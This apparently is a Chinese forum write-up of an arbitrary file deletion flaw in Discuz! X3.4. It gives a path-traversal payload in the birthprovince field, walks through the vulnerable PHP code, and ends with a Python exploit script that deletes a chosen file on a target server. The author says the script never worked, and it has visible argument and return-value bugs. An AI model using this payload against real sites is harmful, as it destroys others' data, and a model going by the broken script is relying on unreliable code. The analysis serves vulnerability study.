去评论
dz插件网

Discuz! X3.4 R20191201及以下版本任意文件删除漏洞

admin
2020/08/10 09:36:02
1、简述
漏洞原因:之前存在的任意文件删除漏洞修复不完全导致可以绕过。
漏洞修复时间:2017年9月29日官方对gitee上的代码进行了修复
2、复现环境
因为官方提供的下载是最新的源码,漏洞修复时间是17年9月29日,通过git找一个修复前的版本签出就可。
  1. git checkout 1a912ddb4a62364d1736fa4578b42ecc62c5d0be

通过安装向导安装完后注册一个测试用户,同时在网站对应目录下创建用于删除的测试文件。
3、漏洞复现
登录账户。
访问该网页:
http://127.0.0.1:8001/dz/upload/home.php?mod=spacecp&ac=profile&op=base

发送POST请求:
  1. http://127.0.0.1:8001/dz/upload/home.php?mod=spacecp&ac=profile&op=base
  2. POST
  3. birthprovince=../../../testfile.txt&profilesubmit=1&formhash=e9d84225
  4. formhash值为用户hash,可在源码中搜索formhash找到。

请求后表单中的出生地内容变为../../../testfile.txt


然后构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件,可以修改表单提交达到目的。

提交后文件被删除。
4、漏洞分析
分析一下对该页面请求时的流程。
在home.php的41行有一次对其他文件的请求:
  1. require_once libfile('home/'.$mod, 'module');

因为GET参数不满足上面代码的条件所以进入这部分。
查看libfile函数的定义:
  1. function libfile($libname, $folder = '') {
  2.     $libpath = '/source/'.$folder;
  3.     if(strstr($libname, '/')) {
  4.         list($pre, $name) = explode('/', $libname);
  5.         $path = "{$libpath}/{$pre}/{$pre}_{$name}";
  6.     } else {
  7.         $path = "{$libpath}/{$libname}";
  8.     }
  9.     return preg_match('/^[\w\d\/_]+$/i', $path) ? realpath(DISCUZ_ROOT.$path.'.php') : false;
  10. }

可以看出该函数的功能就是构造文件路径。
对于复现漏洞时请求页面的GET请求参数:mod=spacecp&ac=profile&op=base
在如上参数的请求时,经过libfile函数处理过后返回的路径为:/source/module/home/home_spacecp.php
跟进到/source/module/home/home_spacecp.php文件,在最后一行也引入了其他的文件,处理方式同上
  1. require_once libfile('spacecp/'.$ac, 'include');
所以这里引入的文件为:/source/include/spacecp/spacecp_profile.php,转到该文件看看。
在第70行,存在如下条件判断,这里也就是页面上的保存按钮点击后触发的相关处理代码:
  1. if(submitcheck('profilesubmit')) {
  2.   ......

submitcheck函数是对profilesubmit的安全检查
  1. function submitcheck($var, $allowget = 0, $seccodecheck = 0, $secqaacheck = 0) {
  2.     if(!getgpc($var)) {
  3.         return FALSE;
  4.     } else {
  5.         return helper_form::submitcheck($var, $allowget, $seccodecheck, $secqaacheck);
  6.     }
  7. }
第187行开始是对文件上传的处理函数:
  1. if($_FILES) {
  2.         $upload = new discuz_upload();
  3.         foreach($_FILES as $key => $file) {
  4.     ......
第207行开始:
  1. if(!$upload->error()) {
  2.                 $upload->save();

  3.                 if(!$upload->get_image_info($attach['target'])) {
  4.                     @unlink($attach['target']);
  5.                     continue;
  6.                 }
  7.                 $setarr[$key] = '';
  8.                 $attach['attachment'] = dhtmlspecialchars(trim($attach['attachment']));
  9.                 if($vid && $verifyconfig['available'] && isset($verifyconfig['field'][$key])) {
  10.                     if(isset($verifyinfo['field'][$key])) {
  11.                         @unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
  12.                         $verifyarr[$key] = $attach['attachment'];
  13.                     }
  14.                     continue;
  15.                 }
  16.                 if(isset($setarr[$key]) && $_G['cache']['profilesetting'][$key]['needverify']) {
  17.                     @unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
  18.                     $verifyarr[$key] = $attach['attachment'];
  19.                     continue;
  20.                 }
  21.                 @unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
  22.                 $setarr[$key] = $attach['attachment'];
  23.             }
文件上传成功,满足!$upload->error(),会执行到unlink语句:
  1. @unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
这里的$key,在前面foreach($_FILES as $key => $file)中定义(189行)。$space在第23行定义,为用户个人资料。
  1. $space = getuserbyuid($_G['uid']);
  2. space_merge($space, 'field_home');
  3. space_merge($space, 'profile');
会从数据库查询用户相关的信息保存到变量$space中。birthprovince就是其中之一。
所以此时$space[key] = $space[birthprovince] = '../../../testfile.txt'
也就解释了复现时修改出生日期为目的文件路径的操作。
这样的话在这里就完成了文件删除的操作。
PS:更改用户信息时通过提交表单事时抓包可以看到各参数名称,可以进行修改。
5、Exp
exp改了半天也没有攻击成功,找了公开的exp也不成功,不知道是exp问题还是环境问题。
  1. import requests
  2. import re
  3. import os

  4. def check_url(target_url):
  5.     parameter = target_url.split('/')
  6.     if parameter[-1] != "home.php":
  7.             print("[*] Please make sure the url end with 'home.php'")
  8.             exit()

  9. def get_cookie(target_url):
  10.     cookie = input("[*] Please paste the cookie:").split(';')  
  11.     cookies = {}
  12.     for i in range(0,len(cookie)):
  13.         name,value=cookie[i].strip().split('=',1)
  14.         cookies[name] = value
  15.     loginurl = target_url + '?mod=spacecp'
  16.     text = requests.get(target_url,cookies=cookies).text
  17.     if '您需要先登录才能继续本操作' in text:
  18.         print("[*] Login error,please check cookies!")
  19.     else:
  20.         return cookies


  21. def del_file(target_url,target_file,cookies):
  22.     loginurl = target_url + '?mod=spacecp'
  23.     text = requests.get(target_url,cookies=cookies).text
  24.     reformhash = 'formhash=.*?&'
  25.     patternformhash = re.compile(reformhash)
  26.     formhash = patternformhash.search(text).group()[9:17]
  27.     print(formhash)
  28.     # set birthprovince
  29.     birthprovinceurl = target_url + '?mod=spacecp&ac=profile'
  30.     birthprovincedata ={
  31.                     "birthprovince":target_file,
  32.                     "profilesubmit":"1",
  33.                     "formhash":formhash
  34.                     }
  35.     requests.post(birthprovinceurl,cookies=cookies,data=birthprovincedata)
  36.     # upload a picture and delete the target file
  37.     basepath = os.path.abspath(os.path.dirname(__file__))
  38.     uploadurl = target_url + '?mod=spacecp&ac=profile&op=base'
  39.     files = {'birthprovince': ("pic.png",open(basepath+'/1.png', 'rb'))}
  40.     data = {
  41.         'formhash':formhash,
  42.         'profilesubmit':'1'
  43.         }
  44.     s=requests.post(uploadurl,cookies=cookies,data=data,files=files)
  45.     print(s.text)
  46.     print("[*] Deleting the file.")


  47. def exp():
  48.     try:
  49.         target_url = input("[*] please input the target url(eg:http://xxxxx/home.php):")
  50.         check_url(target_url)
  51.         cookies,formhash = get_cookie(target_url)
  52.         target_file = input("[*] Please input the target file:")
  53.         del_file(target_url,target_file,cookies,formhash)
  54.     except KeyError as e:
  55.         print("This poc doesn't seem to work.")

  56. if __name__ == "__main__":
  57.     exp()
5、修复方法
对比官方的代码变动,直接删除了几条unlink语句,简单暴力..